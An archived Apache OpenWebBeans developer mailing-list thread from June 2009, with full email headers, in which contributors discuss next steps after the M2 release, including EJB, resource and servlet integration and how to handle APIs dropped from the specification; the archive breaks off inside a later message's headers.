Received: (qmail 88949 invoked from network); 8 Jun 2009 16:53:27 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Jun 2009 16:53:27 -0000 Received: (qmail 99004 invoked by uid 500); 8 Jun 2009 16:53:38 -0000 Delivered-To: [email protected] Received: (qmail 98979 invoked by uid 500); 8 Jun 2009 16:53:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 98950 invoked by uid 99); 8 Jun 2009 16:53:38 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 08 Jun 2009 16:53:38 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO web38206.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Mon, 08 Jun 2009 16:53:29 +0000 Received: (qmail 93610 invoked by uid 60001); 8 Jun 2009 16:53:06 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1244479986; bh=UuVo8QQ6cSz3iwOMkreWRtZCGuxFqJqCyxWgePz00+I=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type; b=1Py0fQCbuGhCWhUkyeepR3fOXEiYVVCBmKcCBCjK+fxFGVlic/ux9W6SUdaGG0QdwZx973b/joc871cDNqfxCqAQfz33HzkrhwtpdTqK95cgPS1S9wvzWGgAYgYKav9ALe2eXkJ9GhP5g5rojDIRQCH92C5zBZujY1seEkGTaFs= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type; b=HxtzdH5+2QpHz6Ksk0MVqyPavDFjrrk9azWhimD7Ua/fc2iBL+UCrRaxbW+tyJIUp/nmVE46n9W0+3CuBrWQ+qg+lo2SMWYvWa832SGQdYRIqDhOChHXNUzkcnVPtigw62E3WuNxIjeqTHHA/I3cEZGMdtrtHPuQ/q0Do/CCFBY=; Message-ID: <[email protected]> X-YMail-OSG: bMOqrrwVM1noj2jnC2nwCPIjesMev281Bim4_CtW8Tbzp9XbvJEUxnzOFvTTysnjrnQsO6iIe7S.78wMbGUfauMJ_T4O3yWDXpzKncLKo4GxB80oiju_WjbIZIoIj7eu.PXazkklRvVUoVbzdK7uC3e7fAh2CuCE8JMnZODlnrYhVA__goghWKZ3m_JWAt3mTubVNcct.rz9AeJrrNRZC4mPh2wkRqahWPO2AlFsAF47rEp9ZDT6RHn.uC31ofbCCtSAzZlSeCbC2JUPx6GdjAXGfNXCSuX7aigETMKjyJflUNX2qywUfStKg7uzobkKK1xFdw-- Received: from [161.129.204.104] by web38206.mail.mud.yahoo.com via HTTP; Mon, 08 Jun 2009 09:53:06 PDT X-Mailer: YahooMailRC/1277.43 YahooMailWebService/0.7.289.15 Date: Mon, 8 Jun 2009 09:53:06 -0700 (PDT) From: Gurkan Erdogdu <[email protected]> Subject: Development Next Steps To: [email protected] MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-1005929734-1244479986=:93044" X-Virus-Checked: Checked by ClamAV on apache.org --0-1005929734-1244479986=:93044 Content-Type: text/plain; charset=us-ascii Hi guys; As you already know, we have succesfully published our M2 version. Altough a spec changes a lot from the last draft version, I think we are on the good track. In the mean time I have sent June board report. In this report I stated one point, from report: NOT : Actually, last draft specification imposes on an implementations that it must be tightly integrated with a Java EE Container's internals , such that integration with an EJB 3.1 Container, Servlet Container, Managed Beans etc. So, we have to work closely on the respective Apache teams to push the implementation. WDYT about the next items ? How could we proceed? Currently, I have been changing OWB API's for obeying to the current draft specification. Moreover, there are mainly the following points that have to be implemented as next 1* EJBs 2* Resources 3* Bean Provider SPI 4* Java Servlet, Managed Bean integration I will try to integrate OpenEJB with OWB. But this will be on a collapsed ear level (ejbs can be placed on the war deployment, ejb3.1 stuff). To real integration with EJBs, we have to work closely with OpenEJB teams. Thanks; --Gurkan --0-1005929734-1244479986=:93044-- From [email protected] Tue Jun 09 06:51:36 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 61719 invoked from network); 9 Jun 2009 06:51:36 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Jun 2009 06:51:36 -0000 Received: (qmail 61899 invoked by uid 500); 9 Jun 2009 06:51:48 -0000 Delivered-To: [email protected] Received: (qmail 61869 invoked by uid 500); 9 Jun 2009 06:51:48 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 61854 invoked by uid 99); 9 Jun 2009 06:51:48 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 09 Jun 2009 06:51:48 +0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO web27806.mail.ukl.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Tue, 09 Jun 2009 06:51:36 +0000 Received: (qmail 13497 invoked by uid 60001); 9 Jun 2009 06:51:14 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.de; s=s1024; t=1244530274; bh=geSTidiv76+byU1Wbgt642Yk/49O83SIqXaSSe311DM=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=3PnrFoObpuUcaiZkna/OzfatPdRNIT6ygbB/70wQC4Wl0LR/yFHHbteu2+tMDUIRilmoHyGm72RPSgjgJ2t8BTduk952cdmfG/8b42I5/dT7mZIEvBI6nYQybafTkExyHazo1qKiLfL8PVZbzLiwMkULHDjFs27lI/aG/mVrf0Y= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.de; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=SFYnrxFPA/EnBnNKSXlGMKieI1ynjjnWIDxFOTSjcVEEtMsCEwLMuw3W0Zg/C7XxktLNWopsLJHjaiRnqXPcRNtVFX5k7W0MTBd+0jnIqr1CF04Nrzy2EhcTsjBvUaNqGX9NMKq9Ns0/d4bMTLvjbvddCP4P3C1DMeGwGaK8ozc=; Message-ID: <[email protected]> X-YMail-OSG: zSvNzRwVM1lg17k5gCT0cibwVON7BoEYws3ifJWmKMGhntcX0yYn3gTtOXLq6MOy33fe1LA8YRjh.WXlbFNyV2g.lonZJg6s0h._xLbHuc9vULS_INk7yEGHFhbsSQv2pumS2bY2189NAVbBNYTa0g.uUz7.bR.PBx.NvwWKSeZA_KRqG7GLvqi0euCUORSxBSzGb6eYtSlkOqrv4VfEGWrfxKeWTIHm0oUX27OfhiCah28CUW3TDE98U5mGZpPr9GCtgPD7ok9LoAX_5pdYCb4fVvlenTEUIUXqMSEJtgZuDAXisXN2DzSl2C4d46Yok3tmIv2ZqKakYnYyPFj03ZnuTd5pF_I8K71JON0- Received: from [161.129.204.104] by web27806.mail.ukl.yahoo.com via HTTP; Tue, 09 Jun 2009 06:51:14 GMT X-Mailer: YahooMailClassic/5.4.12 YahooMailWebService/0.7.289.15 Date: Tue, 9 Jun 2009 06:51:14 +0000 (GMT) From: Mark Struberg <[email protected]> Subject: AW: Development Next Steps To: [email protected] MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org Hi Gurkan! Should we still stick to our approach to split non javaSE parts into plugin= s? I'd prefer it, but not sure if it is still possible. So since now all 'h= eavy' parts are done, I could start working on getting the plugins finished= .=20 Also: did you already remove all parts from the 'official' API which have b= een dropped from the Spec like Observers? Do we like to drop the functionality internally too? :( If not (which I prefer), we should start a new 'owb-internal-api' module. LieGrue, strub --- Gurkan Erdogdu <[email protected]> schrieb am Mo, 8.6.2009: > Von: Gurkan Erdogdu <[email protected]> > Betreff: Development Next Steps > An: [email protected] > Datum: Montag, 8. Juni 2009, 18:53 > Hi guys; >=20 > As you already know, we have succesfully published our M2 > version. Altough a spec changes a lot from the last draft > version, I think we are on the good track.=20 >=20 > In the mean time I have sent June board report.=A0 In > this report I stated one point, from report: >=20 >=20 > NOT : Actually, last draft specification imposes on an > implementations > that it must be tightly integrated with a Java EE > Container's internals > , such that integration with an EJB 3.1 Container, Servlet > Container, > Managed Beans etc. So, we have to work closely on the > respective Apache > teams to push the implementation. >=20 >=20 > WDYT about the next items ? How could we proceed? >=20 > Currently, I have been changing OWB API's for obeying to > the current draft specification. Moreover,=A0 there are > mainly the following points that have to be implemented as > next >=20 > 1* EJBs > 2* Resources > 3* Bean Provider SPI > 4* Java Servlet, Managed Bean integration >=20 > I will try to integrate OpenEJB with OWB. But this will be > on a collapsed ear level (ejbs can be placed on the war > deployment, ejb3.1 stuff). To real integration with EJBs, we > have to work closely with OpenEJB teams. >=20 >=20 > Thanks; >=20 > --Gurkan >=20 >=20 >=20 > =A0 =A0 =A0 =0A=0A=0A From [email protected] Tue Jun 09 07:17:20 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 69483 invoked from network); 9 Jun 2009 07:17:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Jun 2009 07:17:20 -0000 Received: (qmail 92852 invoked by uid 500); 9 Jun 2009 07:17:32 -0000 Delivered-To: [email protected] Received: (qmail 92821 invoked by uid 500); 9 Jun 2009 07:17:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 92811 invoked by uid 99); 9 Jun 2009 07:17:32 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 09 Jun 2009 07:17:32 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-fx0-f220.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 09 Jun 2009 07:17:20 +0000 Received: by fxm20 with SMTP id 20so3662077fxm.12 for <[email protected]>; Tue, 09 Jun 2009 00:16:59 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=9nypEWi2Mz+wBMJ29reT3au4RiRz5QvAkgTHEyPGy94=; b=UzmmBGBkHGtWZcscDjir+bxtI/U/5KgxE23EA8ldi9ZI/cBUshvkI5yKzfGi3m2g8E b+5swSeK7jzYDlOmM/VJ6tAnFcMTJ1CbZ8836mWnmaGf6c7ttSy0Lhi0eY0+juh/Bzlu zgRfXIyRIXRSAHaY+xXy6bzw/ueMfwoTrHMSw= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=UQgTo0DMRU1/IQQpauLCR9t9CSvNZd1LAud9Uutb1FyKibtsJ0qcfivLILXH5qTjeq fpbGE+b2ZblqjV1ljbdk3ZQeRldDzBJKLHiEIDwXikhlAujRlgfkbA2/+AoEnikdo440 vHIUHxL6PY1YJeTxfSboSU73Hol4iyMdTQLmA= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id a1mr4870536fas.78.1244531819832; Tue, 09 Jun 2009 00:16:59 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> Date: Tue, 9 Jun 2009 10:16:59 +0300 Message-ID: <[email protected]> Subject: Re: Development Next Steps From: Mohammad Nour El-Din <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org Hi... I know I have not been active the last period, but thanks God at last I got a home internet connection and I can get back working on OWB. I would be more interested in integrating OWB with OpenEJB. I need to re-read the specs and it going to take me till the end of this week, I hope to more active this time :). On Tue, Jun 9, 2009 at 9:51 AM, Mark Struberg<[email protected]> wrote: > > Hi Gurkan! > > Should we still stick to our approach to split non javaSE parts into plug= ins? I'd prefer it, but not sure if it is still possible. So since now all = 'heavy' parts are done, I could start working on getting the plugins finish= ed. > > Also: did you already remove all parts from the 'official' API which have= been dropped from the Spec like Observers? > Do we like to drop the functionality internally too? :( > If not (which I prefer), we should start a new 'owb-internal-api' module. > > LieGrue, > strub > > --- Gurkan Erdogdu <[email protected]> schrieb am Mo, 8.6.2009: > >> Von: Gurkan Erdogdu <[email protected]> >> Betreff: Development Next Steps >> An: [email protected] >> Datum: Montag, 8. Juni 2009, 18:53 >> Hi guys; >> >> As you already know, we have succesfully published our M2 >> version. Altough a spec changes a lot from the last draft >> version, I think we are on the good track. >> >> In the mean time I have sent June board report.=A0 In >> this report I stated one point, from report: >> >> >> NOT : Actually, last draft specification imposes on an >> implementations >> that it must be tightly integrated with a Java EE >> Container's internals >> , such that integration with an EJB 3.1 Container, Servlet >> Container, >> Managed Beans etc. So, we have to work closely on the >> respective Apache >> teams to push the implementation. >> >> >> WDYT about the next items ? How could we proceed? >> >> Currently, I have been changing OWB API's for obeying to >> the current draft specification. Moreover,=A0 there are >> mainly the following points that have to be implemented as >> next >> >> 1* EJBs >> 2* Resources >> 3* Bean Provider SPI >> 4* Java Servlet, Managed Bean integration >> >> I will try to integrate OpenEJB with OWB. But this will be >> on a collapsed ear level (ejbs can be placed on the war >> deployment, ejb3.1 stuff). To real integration with EJBs, we >> have to work closely with OpenEJB teams. >> >> >> Thanks; >> >> --Gurkan >> >> >> >> > > > > --=20 ---- Thanks - Mohammad Nour - LinkedIn: http://www.linkedin.com/in/mnour ---- "Life is like riding a bicycle. To keep your balance you must keep moving" - Albert Einstein From [email protected] Tue Jun 09 07:23:53 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 71241 invoked from network); 9 Jun 2009 07:23:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Jun 2009 07:23:53 -0000 Received: (qmail 5787 invoked by uid 500); 9 Jun 2009 07:24:04 -0000 Delivered-To: [email protected] Received: (qmail 5776 invoked by uid 500); 9 Jun 2009 07:24:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 5766 invoked by uid 99); 9 Jun 2009 07:24:04 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 09 Jun 2009 07:24:04 +0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO web27804.mail.ukl.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Tue, 09 Jun 2009 07:23:51 +0000 Received: (qmail 50967 invoked by uid 60001); 9 Jun 2009 07:23:30 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.de; s=s1024; t=1244532210; bh=rDxvM6ys6HlrJJxdxPVJtBVpJW49W+Dt02+iNmCYEag=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=Ar80Pf0SybSOmmJXe2cWOAIMl17HtQ7aIh83hCtBnc+q4A2QEtFfIGZJcCnPtJ5nvqOnHxtwXCIwARVydpfcQyy31sG6QP3rQSs1vABgNkPsaa3lF26ITo+ooyqZrllxeQZCwMzNGYEN3bXnNBIr5+cPd0rfma1FxlWmsvvOhag= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.de; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=b7OwC2PtnffBTqvfm77vSkT+Y+LhkkDyXnZJSq85bSGgW5SklmN2TZlU9GVnoKqVMJP/+yIeVi5hjIlVGGR9iGrnYpbqLO6Fi71OGd1PnvBfO1SUl2wzURIni+uRcn1+YqXPwYQLyCSiuePgDaC4Itg1Lgd/H3IWBpCBN7UATJE=; Message-ID: <[email protected]> X-YMail-OSG: 3A_ExNoVM1nJfEnMAMVL5SUkFNzxf2y.MOdhsVEIuFv6_oFAM4ZV2n4AKmFL2vc78q69cIxerXRJBYskFcep8We0WIu5Fxb0GRmK5l753WJpfI6uYILqLxo.XKAQSDzrsxNM.WkGOHyWlUXB0KWAqBCJo.kOGV9umW.4HWVkfbaC1CfnCbp6uEz3aUgJbGXVysd44gkT7w9IN3512Xmf9FVL9_0SBzm0E3AKw7.CwJOh4lHCmt9Je1lpdMxd5mYwKQ0bKZ0uo_43eXoz.CzkhrXzrC7bficjeEzFegD.LcxEzDcINSJRbXB49YWV_ijqyekK0JLsgVgDI722OT7_8eTsRfaEJZXglj7H.0E- Received: from [161.129.204.104] by web27804.mail.ukl.yahoo.com via HTTP; Tue, 09 Jun 2009 07:23:29 GMT X-Mailer: YahooMailClassic/5.4.12 YahooMailWebService/0.7.289.15 Date: Tue, 9 Jun 2009 07:23:29 +0000 (GMT) From: Mark Struberg <[email protected]> Subject: Re: Development Next Steps To: [email protected] MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org Hi and welcome back Mohammad :) You don't missed much, since the spec changed heavily and we also have to r= eread it once again... LieGrue, strub --- Mohammad Nour El-Din <[email protected]> schrieb am Di, 9.6.2009: > Von: Mohammad Nour El-Din <[email protected]> > Betreff: Re: Development Next Steps > An: [email protected] > Datum: Dienstag, 9. Juni 2009, 9:16 > Hi... >=20 > =A0 I know I have not been active the last period, but > thanks God at > last I got a home internet connection and I can get back > working on > OWB. I would be more interested in integrating OWB with > OpenEJB. >=20 > I need to re-read the specs and it going to take me till > the end of > this week, I hope to more active this time :). >=20 >=20 >=20 > On Tue, Jun 9, 2009 at 9:51 AM, Mark Struberg<[email protected]> > wrote: > > > > Hi Gurkan! > > > > Should we still stick to our approach to split non > javaSE parts into plugins? I'd prefer it, but not sure if it > is still possible. So since now all 'heavy' parts are done, > I could start working on getting the plugins finished. > > > > Also: did you already remove all parts from the > 'official' API which have been dropped from the Spec like > Observers? > > Do we like to drop the functionality internally too? > :( > > If not (which I prefer), we should start a new > 'owb-internal-api' module. > > > > LieGrue, > > strub > > > > --- Gurkan Erdogdu <[email protected]> > schrieb am Mo, 8.6.2009: > > > >> Von: Gurkan Erdogdu <[email protected]> > >> Betreff: Development Next Steps > >> An: [email protected] > >> Datum: Montag, 8. Juni 2009, 18:53 > >> Hi guys; > >> > >> As you already know, we have succesfully published > our M2 > >> version. Altough a spec changes a lot from the > last draft > >> version, I think we are on the good track. > >> > >> In the mean time I have sent June board report.=A0 > In > >> this report I stated one point, from report: > >> > >> > >> NOT : Actually, last draft specification imposes > on an > >> implementations > >> that it must be tightly integrated with a Java EE > >> Container's internals > >> , such that integration with an EJB 3.1 Container, > Servlet > >> Container, > >> Managed Beans etc. So, we have to work closely on > the > >> respective Apache > >> teams to push the implementation. > >> > >> > >> WDYT about the next items ? How could we proceed? > >> > >> Currently, I have been changing OWB API's for > obeying to > >> the current draft specification. Moreover,=A0 there > are > >> mainly the following points that have to be > implemented as > >> next > >> > >> 1* EJBs > >> 2* Resources > >> 3* Bean Provider SPI > >> 4* Java Servlet, Managed Bean integration > >> > >> I will try to integrate OpenEJB with OWB. But this > will be > >> on a collapsed ear level (ejbs can be placed on > the war > >> deployment, ejb3.1 stuff). To real integration > with EJBs, we > >> have to work closely with OpenEJB teams. > >> > >> > >> Thanks; > >> > >> --Gurkan > >> > >> > >> > >> > > > > > > > > >=20 >=20 >=20 > --=20 > ---- > Thanks > - Mohammad Nour > - LinkedIn: http://www.linkedin.com/in/mnour > ---- > "Life is like riding a bicycle. To keep your balance you > must keep moving" > - Albert Einstein > =0A=0A=0A From [email protected] Tue Jun 09 08:57:27 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 98625 invoked from network); 9 Jun 2009 08:57:27 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Jun 2009 08:57:27 -0000 Received: (qmail 52164 invoked by uid 500); 9 Jun 2009 08:57:39 -0000 Delivered-To: [email protected] Received: (qmail 52139 invoked by uid 500); 9 Jun 2009 08:57:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 52123 invoked by uid 99); 9 Jun 2009 08:57:39 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 09 Jun 2009 08:57:39 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-fx0-f220.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 09 Jun 2009 08:57:31 +0000 Received: by fxm20 with SMTP id 20so3720117fxm.12 for <[email protected]>; Tue, 09 Jun 2009 01:57:09 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type; bh=cMZnDvOY5al2WT+2Ffd8ZHRbPDcAuLtaEdOwhgMRorU=; b=bCySijqDKDhz6mui1JCbbaBsUtuH2ce8tjp3yKLXCiA1Ee/gP9Auu2AIB4//oemu+M HaLn+xzUZFJFE3PQ+eet8tJXlw4K6+HTeKny1ueo/jcN4gukL8KjMQJvf45nx4oydi0D GF0Y7OZdkG2JNg+L7wjWiW2RlNi/GbEf42GJU= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=SpwVl/JaGdTknyPrZHFS1lT47a0CYGDJePXGaNIz+2ubxCyOG0PbbQiNbJe3x/DpXW a5bEBFF65od/xkbN0qmSXgVpXiKw7EdnKigaT57tTOVWGlAEjUfxesT6v5rexoCHfNml GJ5a8tE1QrVhxiNbDt1xBOXc4jJrWnMmoO1Vo= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id a20mr7600652bkg.35.1244537829132; Tue, 09 Jun 2009 01:57:09 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> Date: Tue, 9 Jun 2009 11:57:09 +0300 Message-ID: <[email protected]> Subject: Re: Development Next Steps From: Gurkan Erdogdu <[email protected]> To: [email protected] Content-Type: multipart/alternative; boundary=001636d34d54370a55046be68b8d X-Virus-Checked: Checked by ClamAV on apache.org --001636d34d54370a55046be68b8d Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit >>>Should we still stick to our approach to split non javaSE parts into plugins? Yes. But we have to change the *Resource* sections into the Bean that I did for JMS. In JMS I created a JMSBean that is responsible for injecting the JMS related artifacts. Currently JPA EntityManagers are injected directly without using any Beans. So we have to create Bean definitions for injecting for all resources. This will change the current JPA integration. >>>Also: did you already remove all parts from the 'official' API which have been dropped from the Spec like Observers? I am changing APIs to reflect the last draft. But if we need that some functionality must be remain in our implementation, I will place those APIs into the our implementation module. For example, lots of exceptions are thrown from the spec like DefinitionException, etc. I will place those into the our implementation module. >>>we should start a new 'owb-internal-api' module. I think this is not necessary. Because, placing those APIs into the implementation module. We have to push the implementation and lets create a community around it. All helps are welcome :) Thanks; --Gurkan 2009/6/9 Mark Struberg <[email protected]> > > Hi Gurkan! > > Should we still stick to our approach to split non javaSE parts into > plugins? I'd prefer it, but not sure if it is still possible. So since now > all 'heavy' parts are done, I could start working on getting the plugins > finished. > > Also: did you already remove all parts from the 'official' API which have > been dropped from the Spec like Observers? > Do we like to drop the functionality internally too? :( > If not (which I prefer), we should start a new 'owb-internal-api' module. > > LieGrue, > strub > > --- Gurkan Erdogdu <[email protected]> schrieb am Mo, 8.6.2009: > > > Von: Gurkan Erdogdu <[email protected]> > > Betreff: Development Next Steps > > An: [email protected] > > Datum: Montag, 8. Juni 2009, 18:53 > > Hi guys; > > > > As you already know, we have succesfully published our M2 > > version. Altough a spec changes a lot from the last draft > > version, I think we are on the good track. > > > > In the mean time I have sent June board report. In > > this report I stated one point, from report: > > > > > > NOT : Actually, last draft specification imposes on an > > implementations > > that it must be tightly integrated with a Java EE > > Container's internals > > , such that integration with an EJB 3.1 Container, Servlet > > Container, > > Managed Beans etc. So, we have to work closely on the > > respective Apache > > teams to push the implementation. > > > > > > WDYT about the next items ? How could we proceed? > > > > Currently, I have been changing OWB API's for obeying to > > the current draft specification. Moreover, there are > > mainly the following points that have to be implemented as > > next > > > > 1* EJBs > > 2* Resources > > 3* Bean Provider SPI > > 4* Java Servlet, Managed Bean integration > > > > I will try to integrate OpenEJB with OWB. But this will be > > on a collapsed ear level (ejbs can be placed on the war > > deployment, ejb3.1 stuff). To real integration with EJBs, we > > have to work closely with OpenEJB teams. > > > > > > Thanks; > > > > --Gurkan > > > > > > > > > > > > -- Gurkan Erdogdu http://gurkanerdogdu.blogspot.com --001636d34d54370a55046be68b8d-- From [email protected] Tue Jun 09 08:58:32 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 98824 invoked from network); 9 Jun 2009 08:58:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Jun 2009 08:58:32 -0000 Received: (qmail 52650 invoked by uid 500); 9 Jun 2009 08:58:44 -0000 Delivered-To: [email protected] Received: (qmail 52625 invoked by uid 500); 9 Jun 2009 08:58:44 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 52615 invoked by uid 99); 9 Jun 2009 08:58:44 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 09 Jun 2009 08:58:44 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-bw0-f219.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 09 Jun 2009 08:58:33 +0000 Received: by bwz19 with SMTP id 19so3737250bwz.12 for <[email protected]>; Tue, 09 Jun 2009 01:58:11 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:in-reply-to:references :date:message-id:subject:from:to:content-type; bh=9CI9Ci9ZBmoVN3vAMHyLCEZT0Bq+oG/Ov0SGqfOn2Lk=; b=E/fuxlmZu98zx58X7fP6s55Tp850m95DR3+EMkNEo+/WfoCAwThmfSLiQed48Y9yFw rtl5VCI42C15GlTNelV1zId8q2P1jlQKw5dRiVTm0Cx79qkQ8x/TnAwHgDbzZLWgeR0L tqCg5GpuvPAgTOp7FaQkRNrGiZIvHY6khrpOs= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; b=kaxWUB2Pv4UMCCFevIL4kOnJ8EUu8mvmT2jOT/UtAe7jbgpaxVhK6KgMIG6abBr3tp 1yhVpRE+1irjhHzXT7pajfhtJJMV1OQ3AU1iBBrycVzpDRvkPyIZC2D3yJTO5Pba9hwN zLIwFAgt0fYnjpvqrXJtLY6K5hfgCNzmjpjSo= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id f12mr7544893bko.137.1244537890984; Tue, 09 Jun 2009 01:58:10 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> 